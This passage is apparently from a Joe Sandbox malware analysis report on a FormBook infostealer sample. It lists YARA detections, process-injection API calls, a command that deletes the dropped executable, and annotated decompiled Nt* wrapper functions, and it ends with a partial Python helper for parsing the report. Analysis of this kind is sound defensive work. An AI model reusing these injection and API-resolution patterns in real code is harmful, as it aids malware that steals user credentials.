                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:high

                                              General

                                              Start time:16:42:41
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\msiexec.exe
                                              Imagebase:0xb50000
                                              File size:73216 bytes
                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:16:42:45
                                              Start date:27/10/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe'
                                              Imagebase:0x4a880000
                                              File size:302592 bytes
                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis


                                                Executed Functions

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e24cdfcf2552676d828d1979f02b72101319d5ebbf5a1c6d67a49fbabbdf5f4f
                                                • Instruction ID: 0e1e832c20b7f79fc7d3b3b0ee37480128c683079c87f3e9580d3ac3cd66f4dc
                                                • Opcode Fuzzy Hash: e24cdfcf2552676d828d1979f02b72101319d5ebbf5a1c6d67a49fbabbdf5f4f
                                                • Instruction Fuzzy Hash: 42A11970E002188BDB14DFE9D484AEEFBF6BF88305F65852AD809AB344DB749941CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4b680865808c80413e604b34de47053c3d622f91f05e34cd014f872726b1d93
                                                • Instruction ID: 8484c8da5b163aa3a9de9421798596f7579ffe47e0e2fe015b0df22b9edd765e
                                                • Opcode Fuzzy Hash: d4b680865808c80413e604b34de47053c3d622f91f05e34cd014f872726b1d93
                                                • Instruction Fuzzy Hash: 0F810674E042188FDB04DFE9D844AEEBBF2BF88306F25852AD809AB354DB749945CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ff29ed78dfa21f2a5717d28bc3e5b5cdc44b7483f3c817e81b374e708cf71bbf
                                                • Instruction ID: 93d883485281aa98dd6af697ea170f7e971e518c9f80e83a3946dd4e648d568d
                                                • Opcode Fuzzy Hash: ff29ed78dfa21f2a5717d28bc3e5b5cdc44b7483f3c817e81b374e708cf71bbf
                                                • Instruction Fuzzy Hash: 1C81CFB0D04229CFDF28CFA9C9806ADBBB2BF89304F20906AD559B7355DB345946CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 005D030F
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423850047.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID:
                                                • API String ID: 963392458-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFAD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFAD3
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessWrite
                                                • String ID:
                                                • API String ID: 3559483778-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DFC12
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: MemoryProcessRead
                                                • String ID:
                                                • API String ID: 1726664587-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DF982
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DF857
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DF857
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DF736
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ResumeThread.KERNELBASE(?), ref: 001DF736
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423247781.000000000013D000.00000040.00000001.sdmp, Offset: 0013D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423134451.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423134451.000000000012D000.00000040.00000001.sdmp, Offset: 0012D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (FV$@2)m$t@V
                                                • API String ID: 0-1773883344
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: (FV$@2)m$t@V
                                                • API String ID: 0-1773883344
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423850047.00000000005D0000.00000040.00000001.sdmp, Offset: 005D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: "$)$.
                                                • API String ID: 0-1221665302
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.423354194.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: UUUU
                                                • API String ID: 0-1798160573
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Executed Functions

                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0029A19F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461761679.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 23%
                                                			E0041A40A(void* __eax, void* __esi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                				void* _t23;
                                                				void* _t32;
                                                				intOrPtr* _t34;
                                                				void* _t36;
                                                
                                                				asm("invalid");
                                                				_t18 = _a4;
                                                				_t34 = _a4 + 0xc48;
                                                				E0041AF60(_t32, _a4, _t34,  *((intOrPtr*)(_t18 + 0x10)), 0, 0x2a);
                                                				_t5 =  &_a40; // 0x414a31
                                                				_t7 =  &_a32; // 0x414d72
                                                				_t13 =  &_a8; // 0x414d72
                                                				_t23 =  *((intOrPtr*)( *_t34))( *_t13, _a12, _a16, _a20, _a24, _a28,  *_t7, _a36,  *_t5, __esi, _t36); // executed
                                                				return _t23;
                                                			}

                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA
                                                • API String ID: 2738559852-782607585
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E0041A410(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                                				void* _t18;
                                                				void* _t27;
                                                				intOrPtr* _t28;
                                                
                                                				_t13 = _a4; // _a4 is the structure every wrapper below receives first; +0x10 and +0xc4x are read from it
                                                				_t28 = _a4 + 0xc48; // function-pointer slot inside that structure
                                                				E0041AF60(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a); // fills the slot: (struct, slot, value at +0x10, 0, index 0x2a)
                                                				_t4 =  &_a40; // 0x414a31
                                                				_t6 =  &_a32; // 0x414d72
                                                				_t12 =  &_a8; // 0x414d72
                                                				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed: indirect call through the slot, observed at run time as NtReadFile (ref 0041A455)
                                                				return _t18;
                                                			}
                                                
                                                Statement addresses: 0x0041a413, 0x0041a41f, 0x0041a427, 0x0041a42c, 0x0041a432, 0x0041a44d, 0x0041a455, 0x0041a459

                                                APIs
                                                • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: 1JA$rMA$rMA (not strings the sample uses: read as little-endian bytes, "1JA" is 0x00414A31 and "rMA" is 0x00414D72, the code pointers seen as arguments of the NtReadFile call at 0041A455 above)
                                                • API String ID: 2738559852-782607585
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • NtQueryInformationProcess.NTDLL ref: 0029A19F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461761679.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                Similarity
                                                • API ID: InformationProcessQuery
                                                • String ID: 0
                                                • API String ID: 1778838933-4108050209
                                                • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                • Instruction ID: 668cfba7c8405fa2bf171a2e00d8834e4bf69665346f1d8eac5aa7919215b7a9
                                                • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                                • Instruction Fuzzy Hash: 21512B70928A9C8FDB69EF68C8946EEB7F4FB98304F40462AD44AD7211DF309645CB41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 29%
                                                			// Decompiled from 0041A35A, six bytes before the real entry E0041A360 listed below. The __eflags
                                                			// test, asm("scasd") and the _t41/_v0 operands come from starting mid-instruction; the else
                                                			// branch (0041A36F..0041A3B1) is the same code as E0041A360, and the if branch decodes
                                                			// 0041A3CF..0041A409, past E0041A360's return, i.e. the neighbouring wrapper that uses slot 0xc44.
                                                			E0041A35A(void* __eax, void* __ebx, void* __eflags, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, struct _ERESOURCE_LITE _a16, struct _GUID _a20, long _a24, long _a28, long _a32, long _a36, void* _a40, long _a44) {
                                                				intOrPtr _v0;
                                                				long _t38;
                                                				void* _t41;
                                                				void* _t58;
                                                				intOrPtr* _t60;
                                                
                                                				if(__eflags != 0) {
                                                					_t60 = __eax + 0xc44;
                                                					E0041AF60(_t58);
                                                					return  *((intOrPtr*)( *_t60))(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, __eax, _t60, _t41);
                                                				} else {
                                                					asm("scasd");
                                                					_t32 = _v0;
                                                					_t3 = _t32 + 0xc40; // 0xc40
                                                					E0041AF60(_t58, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x28);
                                                					_t38 = NtCreateFile(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44); // executed
                                                					return _t38;
                                                				}
                                                			}
                                                
                                                Statement addresses: 0x0041a35b, 0x0041a3cf, 0x0041a3d7, 0x0041a409, 0x0041a35d, 0x0041a35e, 0x0041a363, 0x0041a36f, 0x0041a377, 0x0041a3ad, 0x0041a3b1, 0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                                                • Instruction ID: 344b71f7b3a199d2ddbb085444571a9311c99876aed05395be72b1e04dcb046e
                                                • Opcode Fuzzy Hash: 3c2591368eefec49bbd50e6ae881d5d24ce5faca65f3f94b5b4afbe06a90733e
                                                • Instruction Fuzzy Hash: DD11B4B2214109ABCB08DF99DC84CEB77ADFF8C358B15864DFA1D93215D634E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A360(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40, function-pointer slot for index 0x28
                                                				E0041AF60(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28); // same resolver pattern as the other wrappers: (struct, slot, value at +0x10, 0, index)
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed, through the slot just filled
                                                				return _t21;
                                                			}
                                                
                                                Statement addresses: 0x0041a36f, 0x0041a377, 0x0041a3ad, 0x0041a3b1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A540(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0 (decompiler's run-time value); slot for index 0x30
                                                				E0041AF60(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30); // resolver call, same shape as in the NtCreateFile/NtReadFile/NtClose wrappers
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed, through the slot just filled
                                                				return _t14;
                                                			}
                                                
                                                Statement addresses: 0x0041a54f, 0x0041a557, 0x0041a579, 0x0041a57d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A490(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a943 (decompiler's run-time value); slot for index 0x2c
                                                				E0041AF60(_t11, _a4, _t3,  *_t2, 0, 0x2c); // resolver call, same shape as in the other wrappers
                                                				_t8 = NtClose(_a8); // executed, through the slot just filled
                                                				return _t8;
                                                			}
                                                
                                                Statement addresses: 0x0041a493, 0x0041a496, 0x0041a49f, 0x0041a4a7, 0x0041a4b5, 0x0041a4b9

                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 58%
                                                			// Decompiled from 0041A48A, six bytes before the real entry E0041A490 listed above. The
                                                			// "gs = ..." statement and "0x8bec()" are E0041A490's prologue bytes read mid-instruction
                                                			// (8B EC is mov ebp, esp); from 0041A493 onward the code is identical to E0041A490.
                                                			E0041A48A(void* __ebx, intOrPtr _a4, void* _a8) {
                                                				long _t9;
                                                				void* _t13;
                                                
                                                				gs =  *((intOrPtr*)(__ebx - 0x63));
                                                				0x8bec();
                                                				_t6 = _a4;
                                                				_t3 = _t6 + 0x10; // 0x300
                                                				_t4 = _t6 + 0xc50; // 0x40a943
                                                				E0041AF60(_t13, _a4, _t4,  *_t3, 0, 0x2c);
                                                				_t9 = NtClose(_a8); // executed
                                                				return _t9;
                                                			}
                                                
                                                Statement addresses: 0x0041a48a, 0x0041a48d, 0x0041a493, 0x0041a496, 0x0041a49f, 0x0041a4a7, 0x0041a4b5, 0x0041a4b9

                                                APIs
                                                • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                                                • Instruction ID: 6b97a5c630ec2685c44f67ab0c3518f250d9da488a99e2f68952f22904d5cf3e
                                                • Opcode Fuzzy Hash: e88aaddb16ecc7abfa8ea1c0704b21e9ae7d795a9701f57bb74bc7127bba8e6a
                                                • Instruction Fuzzy Hash: E2D02BA950E2C08BDB10FBB4E4D40CABB60EE8061C72859DFE4A807647D17592159391
                                                Uniqueness

                                                Uniqueness Score: -1.00%
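
The following helper is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It parses the "APIs" lines of the records above, shows that the String ID values 1JA and rMA are the little-endian bytes of the code pointers 0x00414A31 and 0x00414D72 rather than strings, and checks the slot/index pairs of the four Nt* wrappers (0xc40/0x28, 0xc48/0x2a, 0xc50/0x2c, 0xc60/0x30). The linear layout slot = 0xBA0 + 4*index and the 0x400000..0x420000 window used to flag pointer-like arguments are inferences drawn from those four functions, not facts the report states.

```python
"""Helpers for reading the decompiled Nt* wrapper records in this report.

Added example for this page, not code from the Joe Sandbox report or from the
analysed sample. The sample data below is copied from the report's own lines.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Shape of an "APIs" line as printed in the report, for example
#   NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
API_LINE = re.compile(
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{1,8})"
)


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: Tuple[str, ...]   # raw argument strings as printed; "?" means unresolved
    ref: int                # address of the call instruction


def parse_api_line(line: str) -> ApiCall:
    """Parse one report 'APIs' line (bullet and surrounding text are ignored)."""
    m = API_LINE.search(line)
    if m is None:
        raise ValueError(f"not an APIs line: {line!r}")
    raw = m.group("args")
    args = tuple(a.strip() for a in raw.split(",")) if raw else ()
    return ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16))


def decode_pointer_string(s: str) -> Optional[int]:
    """Reinterpret a 3- or 4-character 'string' as the little-endian integer
    made of its bytes. "1JA" is 31 4A 41 -> 0x00414A31 and "rMA" is 72 4D 41
    -> 0x00414D72: the String ID field is showing code pointers, not text."""
    if not 3 <= len(s) <= 4 or not s.isascii():
        return None
    return int.from_bytes(s.encode("ascii"), "little")


def pointer_like_args(call: ApiCall, lo: int = 0x00400000, hi: int = 0x00420000) -> List[int]:
    """Arguments that fall inside the sample's image range (assumed 0x400000..
    0x420000 from the dump at 0x400000) and so are more likely return addresses
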